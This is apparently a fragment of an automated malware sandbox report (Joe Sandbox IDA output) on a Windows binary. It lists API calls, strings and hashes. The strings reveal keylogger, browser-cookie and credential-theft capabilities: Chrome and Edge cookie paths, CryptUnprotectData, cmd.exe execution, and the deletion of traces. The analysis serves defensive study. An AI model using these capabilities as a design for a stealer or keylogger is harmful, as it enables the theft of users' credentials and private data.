                                          • Instruction Fuzzy Hash: DF512C72900219AADB11EB95DC86EEEB77DAF04304F1000BAE505F6191EF746B48CBA9
                                          APIs
                                          • _strpbrk.LIBCMT ref: 0044E7B8
                                          • _free.LIBCMT ref: 0044E8D5
                                            • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                            • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                            • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                          • String ID: *?$.
                                          • API String ID: 2812119850-3972193922
                                          • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                          • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                          • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                          • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                          APIs
                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404066
                                            • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,00475300), ref: 0041BA30
                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                            • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A87E), ref: 0041C52F
                                          • Sleep.KERNEL32(000000FA,00465E84), ref: 00404138
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                          • String ID: /sort "Visit Time" /stext "$@NG
                                          • API String ID: 368326130-3944316004
                                          • Opcode ID: 224469ff984c8010abbfb6a0adb632b57bdffdcff036d90cee6eba18a73402bb
                                          • Instruction ID: 88307c0d9f74f86904655d2c31cb74d6ebeba16a9e6c7dae8368527950f1c452
                                          • Opcode Fuzzy Hash: 224469ff984c8010abbfb6a0adb632b57bdffdcff036d90cee6eba18a73402bb
                                          • Instruction Fuzzy Hash: EB316171A001195ACB15FBA6DC969ED7375AF90308F00007FF60AB71E2EF785E49CA99
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • Part of subcall function 0044F0F7: _abort.LIBCMT ref: 0044F129
                                            • Part of subcall function 0044F0F7: _free.LIBCMT ref: 0044F15D
                                            • Part of subcall function 0044ED6C: GetOEMCP.KERNEL32(00000000,?,?,0044EFF5,?), ref: 0044ED97
                                          • _free.LIBCMT ref: 0044F050
                                          • _free.LIBCMT ref: 0044F086
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free$ErrorLast_abort
                                          • String ID: 0ce$0ce
                                          • API String ID: 2991157371-2458816431
                                          • Opcode ID: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
                                          • Instruction ID: a9f826519387c1ac895116d2974c89b4af6d1f604a138ae73dd4863203302c4b
                                          • Opcode Fuzzy Hash: b0ee2aee4096bb997892b4dec28a89a25a1db6387992807ccb6f750b77acbdfb
                                          • Instruction Fuzzy Hash: 2D31D371900104AFEB10EB69D441B9A77F4EF81325F2540AFE5049B2A3DB7A5D44CB58
                                          APIs
                                            • Part of subcall function 0040C4FE: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Google\Chrome\,00000000), ref: 0040C531
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C658
                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C6C3
                                          Strings
                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C670
                                          • User Data\Default\Network\Cookies, xrefs: 0040C63E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                          • API String ID: 1174141254-1980882731
                                          • Opcode ID: 97a5ada962bae72897b7f94b11cd40aa52c1d6f994a23f407ee9340b66b1d139
                                          • Instruction ID: a3c4a2fc075df05cc4efb8d324c4514c6f5a9a9113215be8183f294a60e8cc46
                                          • Opcode Fuzzy Hash: 97a5ada962bae72897b7f94b11cd40aa52c1d6f994a23f407ee9340b66b1d139
                                          • Instruction Fuzzy Hash: 0621E27190011A96CB14FBA2DC96DEEBB7CAE50319B40053FF506B31D2EF789946C6D8
                                          APIs
                                            • Part of subcall function 0040C561: PathFileExistsW.SHLWAPI(00000000,\AppData\Local\Microsoft\Edge\,00000000), ref: 0040C594
                                          • PathFileExistsW.SHLWAPI(00000000), ref: 0040C727
                                          • PathFileExistsW.SHLWAPI(00000000,-00000011,?,00000000,00000000), ref: 0040C792
                                          Strings
                                          • User Data\Profile ?\Network\Cookies, xrefs: 0040C73F
                                          • User Data\Default\Network\Cookies, xrefs: 0040C70D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: User Data\Default\Network\Cookies$User Data\Profile ?\Network\Cookies
                                          • API String ID: 1174141254-1980882731
                                          • Opcode ID: e30cb4288211014db5c272c31aa753e5001111b8c3c97bf560fde133b4847c17
                                          • Instruction ID: 531025beeaae0c5c42121d483a56170e39db3028f8febaf9efde6b64dfa31b71
                                          • Opcode Fuzzy Hash: e30cb4288211014db5c272c31aa753e5001111b8c3c97bf560fde133b4847c17
                                          • Instruction Fuzzy Hash: 4821127190011A96CB04F7A2DC96CEEBB78AE50359B40013FF506B31D2EF789946C6D8
                                          APIs
                                          • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                          • wsprintfW.USER32 ref: 0040B22E
                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: EventLocalTimewsprintf
                                          • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                          • API String ID: 1497725170-1359877963
                                          • Opcode ID: 598e0a7c0d0d0e60a2011044f18d65c28a10592999ecdaed1c3cad85e009971a
                                          • Instruction ID: 4bcbbea8953a56f0834a7592719eb704c83d71ae81c48fe005db4fd1b538d991
                                          • Opcode Fuzzy Hash: 598e0a7c0d0d0e60a2011044f18d65c28a10592999ecdaed1c3cad85e009971a
                                          • Instruction Fuzzy Hash: 88114272404118AACB19AB96EC55CFE77BCEE48315B00012FF506A61D1FF7C5A45C6AD
                                          APIs
                                            • Part of subcall function 0040B19F: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B1AD
                                            • Part of subcall function 0040B19F: wsprintfW.USER32 ref: 0040B22E
                                            • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2A2,?,00000000,00000000), ref: 0040AFA9
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0000A2C4,?,00000000,00000000), ref: 0040AFB5
                                          • CreateThread.KERNEL32(00000000,00000000,0040A2D0,?,00000000,00000000), ref: 0040AFC1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateThread$LocalTime$wsprintf
                                          • String ID: Online Keylogger Started
                                          • API String ID: 112202259-1258561607
                                          • Opcode ID: a7321385670445bfa9baf585f8c9fa904332ec5059089b328e401a783e90a250
                                          • Instruction ID: 1fd114496b08e8c1d91a2f23279a740fccf8855fe00c80ef0b78f2cd7c44f0e8
                                          • Opcode Fuzzy Hash: a7321385670445bfa9baf585f8c9fa904332ec5059089b328e401a783e90a250
                                          • Instruction Fuzzy Hash: 2A01C4A07003193EE62076368C8BDBF7A6DCA91398F4004BFF641362C2E97D1C1586FA
                                          APIs
                                          • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406ABD
                                          • GetProcAddress.KERNEL32(00000000), ref: 00406AC4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: CryptUnprotectData$crypt32
                                          • API String ID: 2574300362-2380590389
                                          • Opcode ID: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
                                          • Instruction ID: 345ee013d26fc91f442c93551971226c597518e80cf45168a44a65f4e30a47e9
                                          • Opcode Fuzzy Hash: b88f03605d096aaa2152f3ebf69acb5fe9b1e31435291808458d2189a413eed3
                                          • Instruction Fuzzy Hash: 1D01F575A00215BBCB18CFAC8C409AF7BB8EB85300F0041BEE94AE3381DA34AD00CB94
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                          • CloseHandle.KERNEL32(?), ref: 004051CA
                                          • SetEvent.KERNEL32(?), ref: 004051D9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseEventHandleObjectSingleWait
                                          • String ID: Connection Timeout
                                          • API String ID: 2055531096-499159329
                                          • Opcode ID: aea94675e7c534c52cb53f54c205b860b10a02e3c4213e765d5fd14c325240d7
                                          • Instruction ID: 0252d74fe4ede7253ae2eff4a1d35319ac7a80acec65437dc80477e116da68d3
                                          • Opcode Fuzzy Hash: aea94675e7c534c52cb53f54c205b860b10a02e3c4213e765d5fd14c325240d7
                                          • Instruction Fuzzy Hash: 4A01F530A40F00AFD7216F368D8642BBFE0EB00306704093FE68356AE2D6789800CF89
                                          APIs
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E86E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Exception@8Throw
                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                          • API String ID: 2005118841-1866435925
                                          • Opcode ID: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                          • Instruction ID: 287a1f786264602a2f100ba68ee8cd07dacd1bfc9ef62352ff5e55a88b78f620
                                          • Opcode Fuzzy Hash: 393980db8800f491ea7c1a59f80fc085f11d752c19bfb05bf36f8e27219a3784
                                          • Instruction Fuzzy Hash: 59018F626583087AEB14B697CC03FBA33685B10708F10CC3BBD01765C2EA7D6A61C66F
                                          APIs
                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFEC
                                          • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040E02B
                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 004356EC
                                            • Part of subcall function 004356CD: _Yarn.LIBCPMT ref: 00435710
                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E051
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                          • String ID: bad locale name
                                          • API String ID: 3628047217-1405518554
                                          • Opcode ID: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                          • Instruction ID: 7f9ccd90240ef42149755af47b5df127ed13e8783c268b42739d505c0e35a915
                                          • Opcode Fuzzy Hash: 358b3f1522e08b03a3202c9f95d61a93da44700bf44d5321e5e8d61ced44f7e6
                                          • Instruction Fuzzy Hash: 77F08131544A085AC338FA62D863DDA73B49F14358F50457FB406268D2EF78BA0CCA9D
                                          APIs
                                          • CreateThread.KERNEL32(00000000,00000000,Function_0001D4EE,00000000,00000000,00000000), ref: 00416C82
                                          • ShowWindow.USER32(00000009), ref: 00416C9C
                                          • SetForegroundWindow.USER32 ref: 00416CA8
                                            • Part of subcall function 0041CE2C: AllocConsole.KERNEL32(00475348), ref: 0041CE35
                                            • Part of subcall function 0041CE2C: GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                            • Part of subcall function 0041CE2C: ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                            • Part of subcall function 0041CE2C: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$Console$Show$AllocCreateForegroundOutputThread
                                          • String ID: !D@
                                          • API String ID: 186401046-604454484
                                          • Opcode ID: a068d85ce6d20572725b561f13a14384616ca358d13cf0a9e2740917865bf9e7
                                          • Instruction ID: b1493b377ee00385912555b1a5c9642ee05cd41efde33f67b603c236d656be44
                                          • Opcode Fuzzy Hash: a068d85ce6d20572725b561f13a14384616ca358d13cf0a9e2740917865bf9e7
                                          • Instruction Fuzzy Hash: 81F03A70148340AAD720AF65ED55BBABB69EB54301F01487BFA09C20F2DB389C94869E
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041616B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: /C $cmd.exe$open
                                          • API String ID: 587946157-3896048727
                                          • Opcode ID: f44f3a75cb8e05523d561960cc0be4386eb784bc6dcc6058ee8d5990d9ea8ce9
                                          • Instruction ID: 08f4dee505367bf09000beb2be63de5ecd082ae46aa0e0363999309db21c3e05
                                          • Opcode Fuzzy Hash: f44f3a75cb8e05523d561960cc0be4386eb784bc6dcc6058ee8d5990d9ea8ce9
                                          • Instruction Fuzzy Hash: 5EE0C0B0204305ABC605F675DC96CBF73ADAA94749B50483F7142A20E2EF7C9D49C65D
                                          APIs
                                          • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8B1
                                          • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040B8DC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteDirectoryFileRemove
                                          • String ID: pth_unenc$xdF
                                          • API String ID: 3325800564-2448381268
                                          • Opcode ID: ad03ad6105e2805cf24512cd36e8b9a34d70bf8a7d384e6b6b2237e166b151ae
                                          • Instruction ID: ee660421d7ec44f6c6eaad5e9e1fc6482a22fb53094cf60c5c3e5a772ac54322
                                          • Opcode Fuzzy Hash: ad03ad6105e2805cf24512cd36e8b9a34d70bf8a7d384e6b6b2237e166b151ae
                                          • Instruction Fuzzy Hash: 5AE04F314006109BC610BB218854AD6335CAB04316F00497BE4A3A35A1DF38AC49D658
                                          APIs
                                          • TerminateThread.KERNEL32(0040A2B8,00000000,00475300,pth_unenc,0040D0F3,004752E8,00475300,?,pth_unenc), ref: 0040B8F6
                                          • UnhookWindowsHookEx.USER32(00475100), ref: 0040B902
                                          • TerminateThread.KERNEL32(Function_0000A2A2,00000000,?,pth_unenc), ref: 0040B910
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: TerminateThread$HookUnhookWindows
                                          • String ID: pth_unenc
                                          • API String ID: 3123878439-4028850238
                                          • Opcode ID: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                          • Instruction ID: 372ac16de24f92ae7b862ff59389ff52a9cc8b3ac2037ffe6dc6d1e564519698
                                          • Opcode Fuzzy Hash: e1cbc6e2d6c434028aa849536a2aaf0ad10149223ccd3897ab004e8dbc05b34a
                                          • Instruction Fuzzy Hash: 71E01272204315EFD7201F909C888667AADEE1539632409BEF6C261BB6CB7D4C54C79D
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
